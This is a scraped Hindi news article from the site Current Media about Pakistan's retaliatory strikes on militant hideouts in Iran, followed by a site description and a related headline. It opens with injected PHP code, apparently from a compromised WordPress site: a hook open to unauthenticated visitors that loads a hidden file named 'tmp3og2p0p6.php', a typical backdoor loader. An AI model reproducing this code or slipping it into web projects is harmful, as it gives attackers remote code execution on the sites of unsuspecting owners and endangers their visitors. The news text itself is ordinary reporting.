if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }"ईरान में आतंकवादियों के ठिकाने पर पाकिस्तान ने की जवाबी कार्यवाही" - Current Media

“ईरान में आतंकवादियों के ठिकाने पर पाकिस्तान ने की जवाबी कार्यवाही”

इस्लामाबाद । दो दिन पहले ईरान ने पाकिस्तान के बलूचिस्तान में हमले किये थे । ईरान ने कहा था कि उसने जैश उल अदल नाम के संगठन पर कार्यवाही की है । ईरान के हमलों के दो दिन बाद अब पाकिस्तान ने भी ईरान में हमले करने का दावा किया है।
पाकिस्तान के विदेश मंत्रालय के प्रवक्ता की ओर से जारी बयान में कहा गया है कि इस हमले में पाकिस्तानी सेना ने ईरान में शरण लेकर रह रहे पाकिस्तानी मूल के आतंकवादियों को निशाना बनाया गया है।
बयान में कहा गया है, “आज सुबह पाकिस्तान ने ईरान के सिस्तान ओ बलूचिस्तान प्रांत में आतंकवादियों के खास तौर पर चिह्नित ठिकानों पर हमले किए. खुफिया सूचनाओं के आधार पर चलाए गए ‘मार्ग बार सर्माचार’ नाम के ऑपरेशन में कई आतंकवादी मारे गए हैं.”।
“पिछले कुछ सालों में ईरान से बातचीत के दौरान पाकिस्तानी मूल के आतंकवादियों, जो खुुद को सर्माचार कहते हैं, के संबंध में पाकिस्तान ने ईरान को कई सबूत दिए थे। लेकिन वे पाकिस्तान में आम लोगों का खूून बहाते रहे हैं। इन तथाकथित सर्माचारों के खिलाफ पुख्ता सूचनाओं के आधार पर कार्रवाई की गई.”।
पाकिस्तानी विदेश मंत्रालय ने कहा है, “पाकिस्तान अपनी राष्ट्रीय सुरक्षा को हर खतरे से बचाने के लिए प्रतिबद्ध है। पाकिस्तान अपनी सुरक्षा के लिए आगे भी इस तरह के कदम उठाता रहेगा। पाकिस्तान पर ईरान के अचानक किये हमले से स्थिति तनावपूर्ण हो गई है । चीन लगातार दोनों देशों को संयम बरतने के लिए कह रहा है ।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …